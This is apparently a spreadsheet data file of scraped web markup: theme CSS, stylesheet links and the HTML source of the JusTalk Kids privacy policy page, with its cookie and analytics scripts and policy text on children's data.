    <t>ul.mfn-megamenu &gt; li &gt; ul{display:block!important;position:inherit;left:auto;top:auto}#Header_creative.dropdown #Top_bar #menu ul li ul li ul{border-left:0!important;padding:0;top:0}}@media only screen and (min-width: 1240px) {#Top_bar.is-sticky{position:fixed!important;width:100%;left:0;top:-60px;height:60px;z-index:701;background:#fff;opacity:.97;filter:alpha(opacity = 97);-webkit-box-shadow:0 2px 5px 0 rgba(0,0,0,0.1);-moz-box-shadow:0 2px 5px 0 rgba(0,0,0,0.1);box-shadow:0 2px 5px 0 rgba(0,0,0,0.1)}.layout-boxed.header-boxed #Top_bar.is-sticky{max-width:1240px;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.layout-boxed.header-boxed.nice-scroll #Top_bar.is-sticky{margin-left:-5px}#Top_bar.is-sticky .top_bar_left,#Top_bar.is-sticky .top_bar_right,#Top_bar.is-sticky</t>
  </si>
  <si>
    <t>.top_bar_right:before{background:none}#Top_bar.is-sticky .top_bar_right{top:-4px;height:auto;}#Top_bar.is-sticky .top_bar_right_wrapper{top:15px}.header-plain #Top_bar.is-sticky .top_bar_right_wrapper{top:0}#Top_bar.is-sticky .logo{width:auto;margin:0 30px 0 20px;padding:0}#Top_bar.is-sticky #logo{padding:5px 0!important;height:50px!important;line-height:50px!important}#Top_bar.is-sticky #logo img:not(.svg){max-height:35px;width:auto!important}#Top_bar.is-sticky #logo img.logo-main{display:none}#Top_bar.is-sticky #logo img.logo-sticky{display:inline}#Top_bar.is-sticky .menu_wrapper{clear:none}#Top_bar.is-sticky .menu_wrapper .menu &gt;</t>
  </si>
  <si>
    <t>li &gt; a{padding:15px 0}#Top_bar.is-sticky .menu &gt; li &gt; a,#Top_bar.is-sticky .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a span{line-height:30px}#Top_bar.is-sticky .menu &gt; li &gt; a:after{top:auto;bottom:-4px}#Top_bar.is-sticky .menu &gt; li &gt; a span.description{display:none}#Top_bar.is-sticky a.responsive-menu-toggle{top:14px}#Top_bar.is-sticky .secondary_menu_wrapper,#Top_bar.is-sticky .banner_wrapper{display:none}.header-simple #Top_bar.is-sticky .responsive-menu-toggle{top:12px}.header-overlay #Top_bar.is-sticky{display:none}.sticky-dark #Top_bar.is-sticky{background:rgba(0,0,0,.8)}.sticky-dark #Top_bar.is-sticky #menu{background:rgba(0,0,0,.8)}.sticky-dark #Top_bar.is-sticky .menu &gt; li &gt;</t>
  </si>
  <si>
    <t>a{color:#fff}.sticky-dark #Top_bar.is-sticky .top_bar_right a{color:rgba(255,255,255,.5)}.sticky-dark #Top_bar.is-sticky .wpml-languages a.active,.sticky-dark #Top_bar.is-sticky .wpml-languages ul.wpml-lang-dropdown{background:rgba(0,0,0,0.3);border-color:rgba(0,0,0,0.1)}}@media only screen and (max-width: 1239px){.header_placeholder{height:0!important}#Top_bar #menu{display:none;height:auto;width:300px;bottom:auto;top:100%;right:1px;position:absolute;margin:0}#Top_bar a.responsive-menu-toggle{display:block;width:35px;height:35px;text-align:center;position:absolute;top:28px;right:10px;-webkit-border-radius:3px;border-radius:3px}#Top_bar a:hover.responsive-menu-toggle{text-decoration:none}#Top_bar a.responsive-menu-toggle i{font-size:25px;line-height:35px}#Top_bar a.responsive-menu-toggle span{float:right;padding:10px 5px;line-height:14px}#Top_bar #menu &gt; ul{width:100%;float:left}#Top_bar #menu ul li{width:100%;padding-bottom:0;border-right:0;position:relative}#Top_bar #menu ul li a{padding:0 20px;margin:0;display:block;height:auto;line-height:normal;border:none}#Top_bar #menu ul li a:after{display:none}#Top_bar #menu ul li a span{border:none;line-height:48px</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340231"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340231"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</si>
  <si>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css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340232"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340232"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</si>
  <si>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html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="UTF-8"&gt;_x005F_x000D_
    &lt;meta name="viewport"_x005F_x000D_
        content="width=device-width, initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=0"&gt;_x005F_x000D_
    &lt;meta name="format-detection" content="telephone=no"&gt;_x005F_x000D_
    &lt;meta http-equiv="x-rim-auto-match" content="none"&gt;_x005F_x000D_
    &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;_x005F_x000D_
    &lt;meta name="pageName" content="home"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;title&gt;JusTalk Kids - Privacy&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Meta Page Headers --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script&gt;
function setCookie(name,value) {
    var Days = 30;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*24*60*60*1000);
    document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString() + ";path=/";
}
function getCookie(name) {
    var arr,reg = new RegExp("(^| )"</t>
  </si>
  <si>
    <t>+ name + "=( [^;]*)(;|$)");
    if (arr = document.cookie.match(reg)) return unescape(arr[2]);
    return null;
}
function getLang() {
    var cookieLang = getCookie('kids_language');
    if (cookieLang) return cookieLang;
    var lang = navigator.language || navigator.userLanguage;
    return lang.substr(0, 2);
}
function changeLang(lang) {
    setCookie('kids_language', lang)
     location.href = location.origin + '/cn' + location.pathname + location.search;
}
if (getLang() == 'zh') {
   changeLang('zh') 
}
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Standard Metatag --&gt;
    &lt;meta name="generator" content="Justalk" /&gt;
    &lt;meta name="keywords" content="video chat, messenger, kids,  justalk, connect, family, friends, safe" /&gt;
    &lt;meta name="description" content="JusTalk Kids is a free video chat &amp; messaging app designed for kids. Connect with family and close friends safely from a tablet or smartphone today!" /&gt;
    &lt;meta name="author" content="JusTalk Team" /&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>OpenGraph Metatag --&gt;
    &lt;meta name="og:title" property="og:title" content="JusTalk Kids - Safer Kids Video Chat App" /&gt;
    &lt;meta name="og:description" property="og:description" content="JusTalk Kids is a free video chat &amp; messaging app designed for kids. Connect with family and close friends safely from a tablet or smartphone today!"</t>
  </si>
  <si>
    <t>/&gt;
    &lt;meta name="og:type" property="og:type" content="article" /&gt;
    &lt;meta name="og:url" property="og:url" content="http://kids.justalk.com" /&gt;
    &lt;meta name="og:image" property="og:image" content="http://kids.justalk.com/static/share.jpg" /&gt;
    &lt;!-- Facebook Metatag --&gt;
    &lt;meta name="fb:app_id" property="fb:app_id" content="370164013190391" /&gt;
    &lt;!-- Twitter Metatag --&gt;
    &lt;meta name="twitter:card" property="twitter:card" content="summary" /&gt;
    &lt;meta name="twitter:site" property="twitter:site" content="@JustalkApp" /&gt;
    &lt;meta name="twitter:title" property="twitter:title" content="JusTalk Kids - Safer Kids Video Chat App" /&gt;
    &lt;meta name="twitter:description" property="twitter:description" content="JusTalk</t>
  </si>
  <si>
    <t>Kids is a free video chat &amp; messaging app designed for kids. Connect with family and close friends safely from a tablet or smartphone today!" /&gt;
    &lt;meta name="twitter:image" property="twitter:image" content="http://kids.justalk.com/static/share.jpg" /&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Others Metatag --&gt;
    &lt;meta itemprop="name" content="JusTalk Kids - Safer Kids Video Chat App"&gt;
    &lt;meta itemprop="description" content="JusTalk Kids is a free video chat &amp; messaging app designed for kids. Connect with family and close friends safely from a tablet or smartphone today!"&gt;
    &lt;meta itemprop="image" content="http://kids.justalk.com/static/share.jpg"&gt;_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>end Meta Page Headers --&gt;_x005F_x000D_
_ x000D_
    &lt;!-- css --&gt;_x005F_x000D_
    &lt;link rel="shortcut icon" href="/static/favicon.ico" type="image/x-icon"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/static/css/reset.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/static/css/bootstrap-grid.min.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/static/css/swiper.min.css"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/static/css/main.css?v=3.7"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="/static/css/response.css?v=3.7"&gt;_x005F_x000D_
    &lt;!-- end css --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
    &lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-122855106-1"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script&gt;_x005F_x000D_
    window.dataLayer</t>
  </si>
  <si>
    <t>&lt;body ontouchstart class="page-home"&gt; --&gt;_x005F_x000D_
&lt;body ontouchstart class="page-home" onmousemove=/HideMenu()/ oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- header --&gt;_x005F_x000D_
     &lt;header id="header"&gt;
    &lt;div class="container-fluid"&gt;
      &lt;div class="header-logo pull-left"&gt;
        &lt;a href="/"&gt;&lt;img src="/static/img/logo.png" alt="" height="48"&gt;&lt;/a&gt;
      &lt;/div&gt;
            &lt;div class="header-btn pull-right"&gt;
        &lt;a class="btn-ios" href="https://itunes.apple.com/app/apple-store/id1403744827?pt=119122987&amp;ct=website&amp;mt=8" target="_blank"&gt;&lt;img src="/static/img/btn-apple.png" alt="" width="148"&gt;&lt;/a&gt;
        &lt;a class="btn-android" href="https://play.google.com/store/apps/details?id=com.justalk.kids.android&amp;referrer=utm_source%3Dwebsite" target="_blank"&gt;&lt;img src="/static/img/btn-google.png" alt="" width="148"&gt;&lt;/a&gt;
        &lt;a class="btn-android" href="https://www.amazon.com/dp/B07DRN7XGK" target="_blank"&gt;&lt;img src="/static/img/btn-amazon.png" alt="" width="148"&gt;&lt;/a&gt;
      &lt;/div&gt;
          &lt;/div&gt;
  &lt;/header&gt;    &lt;!-- end header --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;section class="common-section"&gt;_x005F_x000D_
_x005F_x000D_
        &lt;style&gt;_x005F_x000D_
        .test-container {_x005F_x000D_
            max-width: 1300px;_x005F_x000D_
            margin: 0 auto;_x005F_x000D_
            padding: 0 15px;_x005F_x000D_
            padding-top: 70px;_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        .test-container a {_x005F_x000D_
            color: #ed445a;_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        @media screen and (max-width:1440px) {_x005F_x000D_
            .test-container {_x005F_x000D_
                max-width: 966px;_x005F_x000D_
            }_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        @media screen and (max-width:1360px) {_x005F_x000D_
            .test-container {_x005F_x000D_
                max-width: 825px;_x005F_x000D_
            }_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        @media screen and (max-width:991px) {_x005F_x000D_
            .test-container {_x005F_x000D_
                padding-top: 30px;_x005F_x000D_
            }_x005F_x000D_
_x005F_x000D_
            .test-container {_x005F_x000D_
                font-size: 10px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
            }_x005F_x000D_
        }_x005F_x000D_
        &lt;/style&gt;_x005F_x000D_
_ x000D_
        &lt;div class="test-container"&gt;_x005F_x000D_
_x005F_x000D_
            &lt;div class="simditor-body" contenteditable="true"&gt;_x005F_x000D_
                &lt;h3&gt;&lt;span style="color: rgb(29, 33, 41);"&gt;&lt;b&gt;JusTalk&lt;/b&gt;&lt;/span&gt;&lt;span_x005F_x000D_
                        style="color: rgb(29, 33, 41);"&gt;&lt;b&gt;&amp;nbsp;Kids Privacy Policy&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;_x005F_x000D_
                &lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;Ningbo Jus Internet Technology Co., Ltd. ("Jus" or "Company" or "we"_x005F_x000D_
                        or "us" or "our" or other similar pronouns) takes your ("you" or "user" or other similar_x005F_x000D_
                        pronouns) privacy matters very seriously. JusTalk Kids by Jus is a children's video calling and_x005F_x000D_
                        messaging app that helps your children communicate with family and friends in a fun, controlled_x005F_x000D_
                        environment.</t>
  </si>
  <si>
    <t>The Policy details how we receive, collect and use information in connection with_x005F_x000D_
                        our website (the "Site") and JusTalk Kids software ("JusTalk Kids" or the "Software") (All of_x005F_x000D_
                        the foregoing, collectively, are named "Services").&lt;/span&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span_x005F_x000D_
                            style="color: rgb(51, 51, 51); font-size: 1.25em;"&gt;&lt;b&gt;Privacy Principles&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(51, 51, 51); font-size: 1.25em;"&gt;&lt;span_x005F_x000D_
                            style="color: rgb(29, 33, 41);"&gt;JusTalk&lt;/span&gt; &lt;span_x005F_x000D_
                            style="color: rgb(51, 51, 51);"&gt;Kids&amp;nbsp;&lt;/span&gt;has two fundamental principles when it_x005F_x000D_
                        comes to personal information:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                            style="color: rgb(51, 51, 51); font-size: 1.25em;"&gt;1. We don't sell your personal_x005F_x000D_
                            information.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;2. We only store the personal information_x005F_x000D_
                        that we need to operate our Service so you can communicate with the people you choose.&lt;/span&gt;_x005F_x000D_
                &lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                    style="color: rgb(51, 51, 51); font-size: 1.25em;"&gt;&lt;br&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                    style="color: rgb(51, 51, 51); font-size:</t>
  </si>
  <si>
    <t>1.25em;"&gt;This Policy applies to anyone who_x005F_x000D_
                                    accesses the Service. By visiting the Website and/or using the Apps or Service, you_x005F_x000D_
                                    acknowledge that the collection, use, and sharing of your information will take_x005F_x000D_
                                    place as described in this Policy.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                        style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                            style="color: rgb(51, 51, 51);"&gt;&lt;br&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/p&gt;_x005F_x000D_
                 &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span_x005F_x000D_
                                        style="color: rgb(51, 51, 51);"&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;So we are_x005F_x000D_
                                            clear about the terminology we are using, when we use the phrase "Personal_x005F_x000D_
                                            Information" in this Privacy Policy, we mean information that is capable of_x005F_x000D_
                                            being associated with or could reasonably be linked with you, such as your_x005F_x000D_
                                            name, email, or mobile_x005F_x000D_
                                            number.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="color: rgb(29, 33, 41); font-size: 1.25em;"&gt;&lt;b&gt;What kinds of information do we_x005F_x000D_
                            collect?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;JusTalk Kids must receive or collect some information to operate,_x005F_x000D_
                        provide, improve, understand, customize, support, and market our Services, including when you_x005F_x000D_
                        install, access, or use our Services.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;br&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;The types of information we receive and collect depend on how you_x005F_x000D_
                        use our Services.</t>
  </si>
  <si>
    <t>We require certain information to deliver our Services and without this we_x005F_x000D_
                        will not be able to provide our Services to you. For example, you must provide your basic_x005F_x000D_
                        information (including a profile name of your choice and date of birth) to create an account to_x005F_x000D_
                        use our Services.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;br&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;Our Services have optional features which, if used by you, require_x005F_x000D_
                        us to collect additional information to provide such features.</t>
  </si>
  <si>
    <t xml:space="preserve">You will be notified of such_x005F_x000D_
                        collection, as appropriate. If you choose not to provide the information needed to use a_x005F_x000D_
                        feature, you will be unable to use the feature. Permissions can be managed through your Settings_x005F_x000D_
                        menu on both Android and iOS devices.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 28.8pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;b&gt;&lt;br&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 28.8pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;b&gt;Information and content parents and_x005F_x000D_
                            children provide.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 28.8pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;i&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;●&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;b&gt;Registration_x005F_x000D_
                                </t>
  </si>
  <si>
    <t>Information.&lt;/b&gt;&lt;/i&gt;&amp;nbsp;Depending on the features you and your child use, we collect_x005F_x000D_
                        the following information:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 57.6pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;Your child’s name, any log-in details you or your child_x005F_x000D_
                        provide;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 57.6pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;Your child’s demographic information,_x005F_x000D_
                        such as country/region, gender, and &lt;span style="color: rgb(51, 51, 51);"&gt;profile_x005F_x000D_
                            picture&lt;/span&gt;, if you choose to provide them;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                 &lt;p style="margin-left: 57.6pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;Additional information about your child_x005F_x000D_
                        that you or your child may provide.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i&gt;&lt;b&gt;Friends_x005F_x000D_
                                on&amp;nbsp;JusTalk&amp;nbsp;Kids.&lt;/b&gt;&lt;/i&gt;&amp;nbsp;We collect information about the people your_x005F_x000D_
                        child connects with on&amp;nbsp;JusTalk&amp;nbsp;Kids and how they interact with them.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;span_x005F_x000D_
                            style="color: rgb(51, 51, 51);"&gt;●&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span_x005F_x000D_
                            style="color: rgb(51, 51, 51);"&gt;&lt;i&gt;&lt;b&gt;Your messages.&lt;/b&gt;&lt;/i&gt; We want you to be assured that_x005F_x000D_
                            we do not read or listen to the content of your messages and/or calls made privately via_x005F_x000D_
                            JusTalk Kids and we do not store those messages once they have been delivered to their_x005F_x000D_
                            destination (which on average takes less than one second).</t>
  </si>
  <si>
    <t xml:space="preserve">If for some reason, the message,_x005F_x000D_
                            wasn't delivered to its destination within up to 15 days, it will be deleted from our_x005F_x000D_
                            servers. We also offer end-to-end encryption for our Services, which is on by default, when_x005F_x000D_
                            you and the people with whom you message use our app. End-to-end encryption means that your_x005F_x000D_
                            messages are encrypted to protect against us and third parties from reading_x005F_x000D_
                            them.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i&gt;&lt;b&gt;Data from device_x005F_x000D_
                                settings.&lt;/b&gt;&lt;/i&gt; Information provided through device settings you or your child turn_x005F_x000D_
                        on, like access to your camera, photos, or microphone.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                </t>
  </si>
  <si>
    <t>&lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp; &lt;i&gt;&lt;b&gt;Customer support and other_x005F_x000D_
                                communications.&lt;/b&gt;&lt;/i&gt; When you contact us for customer support or otherwise_x005F_x000D_
                        communicate with us, you may provide us with information related to your use of our Services,_x005F_x000D_
                        including copies of your messages, any other information you deem helpful, and how to contact_x005F_x000D_
                         you (e.g., an email address).</t>
  </si>
  <si>
    <t>For example, you may send us an email with information relating to_x005F_x000D_
                        app performance or other issues.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i style=""&gt;&lt;b&gt;Information_x005F_x000D_
                                you shared on Moments.&lt;/b&gt;&lt;/i&gt; When you use JusTalk Kids’s Moments feature, the text,_x005F_x000D_
                        photos, videos, likes and other information you upload will be stored on our servers as_x005F_x000D_
                        necessary to implement this feature. Such information will be stored in an encrypted way. You_x005F_x000D_
                        may delete it at any time.</t>
  </si>
  <si>
    <t>Unless authorized by yourself or required by laws and regulations, we_x005F_x000D_
                        will not provide such information in your Moments to any third party or use it for any purposes_x005F_x000D_
                        other than implementing this feature.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i&gt;&lt;b&gt;Your phone_x005F_x000D_
                                number.&lt;/b&gt;&lt;/i&gt; Users who purchased the in-app purchases product(s) on JusTalk Kids will_x005F_x000D_
                        be able to connect your phone number with your JusTalk Kids account in order to log in with your_x005F_x000D_
                        phone number, or get your account back when you forget your password, if you choose to provide_x005F_x000D_
                        them.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 80px;"&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="color: rgb(51, 51, 51); font-size: 1.25em;"&gt;&lt;b&gt;Information we_x005F_x000D_
                            collected automatically.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;i&gt;&lt;span_x005F_x000D_
                                style="color: rgb(51, 51, 51);"&gt;●&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;b&gt;Usage and Log Information on_x005F_x000D_
                                JusTalk Kids.&lt;/b&gt;&lt;/i&gt; We collect information about your activity on our Services. This includes information about your activity(including how you use our Services, your Services settings, how you interact with others using our Services, and the time, frequency, and duration of your activities and interactions), log files, and crash reports.</t>
  </si>
  <si>
    <t>This also includes information about when you registered to use our Services; the features you use like our messaging, calling, groups; and whether you are online, when you last used our Services(your "last seen").&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i&gt;&lt;b&gt;Device_x005F_x000D_
                                information.&lt;/b&gt;&lt;/i&gt;&amp;nbsp;We collect information from or about the phone or other device where the JusTalk Kids App is installed. This includes, for example, information about the operating system, hardware version, device settings, language and time zone.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;i&gt;&lt;b&gt;Cookie.&lt;/b&gt;&lt;/i&gt; We may_x005F_x000D_
                        use cookies to understand which of pages on our website are most popular.</t>
  </si>
  <si>
    <t>Additionally, we may_x005F_x000D_
                        use cookies to remember your choices, like your language preferences, to provide a safer_x005F_x000D_
                        experience. We will never (and will not allow any third party to) use the statistical analytics_x005F_x000D_
                        tool to track or to collect any Personally Identifiable Information (PII) of our website_x005F_x000D_
                        visitors. Third-party analytics Service Providers will not associate your IP address with any_x005F_x000D_
                        other data held by them.</t>
  </si>
  <si>
    <t>We will not associate any data gathered from this site with any_x005F_x000D_
                        Personally Identifiable Information from any source.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 80px;"&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_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 &lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;b&gt;Information we obtain from_x005F_x000D_
                            third-party.&lt;/b&gt;&lt;/span&gt; &lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp; &lt;i&gt;&lt;b&gt;User reports.&lt;/b&gt;&lt;/i&gt; Just_x005F_x000D_
                        as you can report other users, other users may also choose to report to us your interactions and_x005F_x000D_
                        your messages with them or others on our Services; for example, to report possible violations of_x005F_x000D_
                        our Terms or policies. When a report is made, we collect information on both the reporting user_x005F_x000D_
                        and the reported user.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;i&gt;●&amp;nbsp;&amp;nbsp;&lt;b&gt;Third-party service_x005F_x000D_
                                providers.&lt;/b&gt;&lt;/i&gt; We work with third-party service providers to provide, improve, and_x005F_x000D_
                        market our Services.</t>
  </si>
  <si>
    <t>For example, we work with them to distribute our apps and help us_x005F_x000D_
                        understand how people use our Services. These companies may provide us with information about_x005F_x000D_
                        you in certain circumstances; for example, app stores may provide us with reports to help us_x005F_x000D_
                        diagnose and fix service issues.&amp;nbsp;These companies may offer products and services subject to_x005F_x000D_
                        their own terms of service or privacy policies.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
                &lt;p style="margin-left: 40px;"&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_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&lt;p&gt;&lt;span style="font-size: 1.25em;"&gt;&lt;span style="color: rgb(29, 33, 41);"&gt;If at any time parents want to_x005F_x000D_
                            access, correct, or delete data associated with their kid's account, they will need to sign_x005F_x000D_
                            in as their child or can contact us at &lt;/span&gt;&lt;a_x005F_x000D_
                            href="mailto:kids@justalk.com"&gt;kids@justalk.com&lt;/a&gt;&lt;span_x005F_x000D_
                            style="color: rgb(29, 33, 41);"&gt;.&lt;/span&gt;&lt;/span&gt;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 style="margin-left: 28.8pt;"&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_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&lt;p&gt;&lt;span style="color: rgb(29, 33, 41); font-size:</t>
  </si>
  <si>
    <t>1.25em;"&gt;&lt;b&gt;How do we use this_x005F_x000D_
                            information?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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 style="margin-left: 28.8pt;"&gt;&lt;span style="font-size: 1.25em;"&gt;●&amp;nbsp;&amp;nbsp;&lt;b&gt;Provide, improve, and_x005F_x000D_
                            develop services.&lt;/b&gt;&amp;nbsp;We are able to deliver, support, and enhance_x005F_x000D_
                        the&amp;nbsp;JusTalk&amp;nbsp;Kids App by using this information. For instance, we use it to personalize_x005F_x000D_
